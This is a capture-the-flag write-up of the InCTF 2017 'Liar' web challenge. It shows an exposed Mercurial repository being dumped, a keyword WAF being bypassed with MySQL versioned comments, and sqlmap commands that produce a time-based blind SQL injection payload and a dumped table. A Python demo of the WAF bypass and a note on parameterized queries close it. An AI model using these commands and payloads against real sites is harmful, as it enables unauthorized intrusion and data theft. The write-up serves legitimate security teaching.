| By | Version | Comment |
|-------|---------|----------|
| noraj | 1.0 | Creation |
CTF

- Name : InCTF 2017
- Website : ctf.inctf.in
- Type : Online
- Format : Jeopardy
- CTF Time : link
300 - Liar - Web
We don't have anything in our website.
Link
There is a VCS (version control system) directory exposed by the web server.
Git is not the only VCS; here we have a Mercurial repository (`.hg/`).
I used DVCS-ripper to dump the repository:
```
$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)
```
Even though their content could not be downloaded, `hg status` lists the files tracked by the repository (`!` means tracked but missing locally), which reveals other files that live on the web server but are not available in the dumped repository:

```
$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php
```
`1ts_h4rd_t0_gu3ss/index.html` has a form that sends its input to `1ts_h4rd_t0_gu3ss/vulnerable.php`, and there are comments hidden in the page source:

```html
<!--Could You beat our security!!!--!>
<!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>
```
So there is an SQL injection.
I tried manually to test whether some input was filtered.
I saw that all SQL keywords were detected by a WAF, but wrapping them in MySQL versioned comments (versioned keywords) worked.
Then I tried with sqlmap, but the WAF detected an automated tool, so I told sqlmap to use a custom user agent and my cookie.
Then we have a classic time-based blind SQLi.
```
$ sqlmap -u http://liar.inctf.in/1ts_h4rd_t0_gu3ss/vulnerable.php --method=POST --data='name=john' --dump --user-agent='Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0' --cookie='__cfduid=da3d6e025cbfedf0e2f3e6a695f45bdaf1513502488' --tamper=versionedkeywords --dbms=mysql -v 3 --level 2 --risk 3
[...]
Parameter: name (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
[...]
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[...]
Database: CTF
Table: gu3ss1ng_must_n0t_h4pp3n
[5 entries]
+--------------------------------+----------------+---------+
| phone                          | email          | user    |
+--------------------------------+----------------+---------+
| 12345                          | admin@bi0s.com | <blank> |
| inctf{H0w_@b0Ut_@n_r3@L_1nJ3c} | InCTF flag     | <blank> |
| 100                            | rahul@bi0s.com | <blank> |
| 900                            | ram@google.com | <blank> |
| 123456                         | ram@yahoo.com  | <blank> |
+--------------------------------+----------------+---------+
[...]
```
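To show why the keyword WAF was bypassable, here is an added example (my own code, not the challenge's WAF or `vulnerable.php`): a naive word-boundary keyword blacklist applied to the raw POST body, beside the same blacklist applied to the body as MySQL's parser actually sees it, once `/*!NNNNN ... */` versioned comments are unwrapped. The keyword list and the three sample bodies are constructed; the plain payload is the one sqlmap reported above.

```python
import re

# Keywords a naive blacklist WAF might look for as whole words (constructed
# list; the challenge's real WAF rule set is not known).
KEYWORD_RE = re.compile(r"\b(select|union|or|and|sleep|benchmark|from|where)\b", re.I)

# MySQL versioned comment: /*!NNNNN body */ is executed as `body` by a MySQL
# server whose version is >= NNNNN; other databases treat it as a comment.
VERSIONED_RE = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def naive_waf_blocks(body: str) -> bool:
    """Keyword blacklist on the raw request body.
    In `/*!50000OR*/` the version digits glue to the keyword, so the \\b
    boundary never fires and the keyword slips past the regex."""
    return KEYWORD_RE.search(body) is not None


def mysql_view(body: str) -> str:
    """Rewrite the body as MySQL will parse it: unwrap versioned comments,
    drop ordinary comments, collapse whitespace."""
    body = VERSIONED_RE.sub(r" \1 ", body)
    body = PLAIN_COMMENT_RE.sub(" ", body)
    return re.sub(r"\s+", " ", body).strip()


def normalizing_waf_blocks(body: str) -> bool:
    """Same blacklist, applied to the parser's view instead of the raw bytes."""
    return KEYWORD_RE.search(mysql_view(body)) is not None


# Constructed samples: the plain payload from the sqlmap output, a versioned-
# comment variant in the spirit of the tamper script, and a benign name.
PLAIN = "john') OR SLEEP(5) AND ('PuTF'='PuTF"
VERSIONED = "john') /*!50000OR*/ /*!50000SLEEP*/(5) /*!50000AND*/ ('PuTF'='PuTF"
BENIGN = "John O'Reilly"

if __name__ == "__main__":
    for label, body in (("plain", PLAIN), ("versioned", VERSIONED), ("benign", BENIGN)):
        print(f"{label:9} naive={naive_waf_blocks(body)!s:5} "
              f"normalizing={normalizing_waf_blocks(body)!s:5} -> {mysql_view(body)}")
```

Normalizing closes this one gap, but the durable fix for `vulnerable.php` is a parameterized query, where `name` can never be parsed as SQL at all.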